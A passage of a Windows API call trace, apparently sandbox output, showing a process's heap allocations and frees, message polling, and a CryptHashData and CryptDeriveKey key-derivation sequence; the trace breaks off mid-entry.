[0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.056] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0120.057] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.057] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0120.057] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xe) returned 0x43ca838 [0120.058] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43ca838, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.058] CryptHashData (hHash=0x41ac280, pbData=0x17e2b18, dwDataLen=0x22, dwFlags=0x1) returned 1 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e9350 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2c08 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0120.058] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e8f00 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0120.059] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0120.059] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca9a0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0120.059] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.059] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8b0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0120.060] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca7c0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0120.060] PeekMessageW (in: lpMsg=0x144e744, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e744) returned 0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa18 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0120.060] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8f8 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa30 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca970 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2870 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa60 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0120.061] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0120.061] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2740 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.062] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0120.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0120.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43ca790 [0120.098] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43ca790, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0120.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0120.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0120.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0120.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2850 [0120.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0120.098] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac280, dwFlags=0x1, phKey=0x144e778 | out: phKey=0x144e778*=0x41ac600) returned 1 [0120.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0120.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e99c8 [0120.098] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0120.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0120.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0120.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0120.099] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa78 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0120.099] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0120.100] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0120.101] HeapFree (in: 